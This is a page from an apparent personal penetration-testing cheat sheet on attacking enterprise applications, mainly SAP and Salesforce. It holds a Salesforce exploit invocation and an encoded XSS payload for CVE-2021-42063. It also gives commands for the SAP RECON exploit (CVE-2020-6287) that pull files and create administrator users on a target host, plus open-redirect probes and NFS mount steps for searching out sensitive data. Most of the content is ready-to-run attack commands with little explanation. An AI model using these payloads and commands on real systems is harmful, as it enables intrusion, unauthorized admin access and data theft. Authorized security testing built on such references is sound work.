Initializing VAULT-TEC OS...
Loading security protocols...
Establishing secure connection...
Connection established.
SYSTEM READY

Vault-Tec Terminal

ABOUT POSTS NOTES TOOLS

CheatSheets

CURL DNS File Transfer Hydra Impacket JohnTheRipper NCAT NMAP Online Resources Reverse Shell Wordlists

Active Directory

Mindmap Attacking AD Linux AD

Cloud

AWS Azure Google Terraform

Container

Docker Kubernetes

Linux

Penetration Testing Checklist Enumeration Privilege Escalation Post Exploitation Services Tools

Network

Data Exfiltration Port Scanning Reconnaissance Pivoting Services Traffic Analysis

Tech Stack

CMS Databases DevOps Enterprise Apps IAM Monitoring Open-Source Utilities Web Servers

Windows

AV/EDR Evasion Enumeration Privilege Escalation Post Exploitation

Web Application

Reconnaissance Common Vulnerabilities Authentication Bypass API Testing

Pentesting Enterprise Applications

Saleforce Aura Lightning

https://github.com/moniik/poc_salesforce_lightning 
python3 exploit.py -u https://domain.force.com/path/ -[option]

SAP

SAP Audit&Pentest
SAP PT with Metasploit
SAP PT Basic guide - 1
SAP PT Basic guide - 2
SAP PT Basic guide - 3
Response Header Injection in SAP HTTP Content Server
Bizploit guide
SAP PT Guide by networkintelligence - 1
SAP PT Guide by networkintelligence - 2
SAP PT Guide by networkintelligence - 3

SAP-Pentest-Cheatsheet

SAP Web Interface Vulnerability

#Open Redirection Check
https://HOST/sap/public/bc/icf/logoff?redirecturl=MALICIOUSURL

#Unsecured Protocol (HTTP) Check
http://HOST:PORT/startPage
http://HOST:PORT/sap/public/info

#System Informational Misconfiguration Check
http://HOST:PORT/sap/public/info

#XSS (CVE-2021-42063) - look for /SAPIrExtHelp
https://localhost/SAPIrExtHelp

https://HOST/SAPIrExtHelp/random/%22%3e%3c%53%56%47%20%4f%4e%4c%4f%41%44%3d%26%23%39%37%26%23%31%30%38%26%23%31%30%31%26%23%31%31%34%26%23%31%31%36%28%26%23%78%36%34%26%23%78%36%66%26%23%78%36%33%26%23%78%37%35%26%23%78%36%64%26%23%78%36%35%26%23%78%36%65%26%23%78%37%34%26%23%78%32%65%26%23%78%36%34%26%23%78%36%66%26%23%78%36%64%26%23%78%36%31%26%23%78%36%39%26%23%78%36%65%29%3e.asp

#SAP Information System 1.0 Shell Upload

#CVE-2022-22536 (ICMAD SAP)

#SAP RECON vulnerability (CVE-2020-6287, CVE-2020-6286)
https://github.com/chipik/SAP_RECON
# 1.Download zip file
python RECON.py -H 172.16.30.8 -f /1111.zip

# 2.Create SAP JAVA user
python RECON.py -H 172.16.30.8 -u

# 3.Create SAP JAVA Administrator user
python RECON.py -H 172.16.30.8 -a

SAP Network Vulnerability

#SSL Vulnerability Check
sslscan

#NFS Mount
nfs-ls nfs://HOST/mount
mkdir mnt && mount -t nfs HOST:/mount ./mnt
#Search for sensitive information in nfs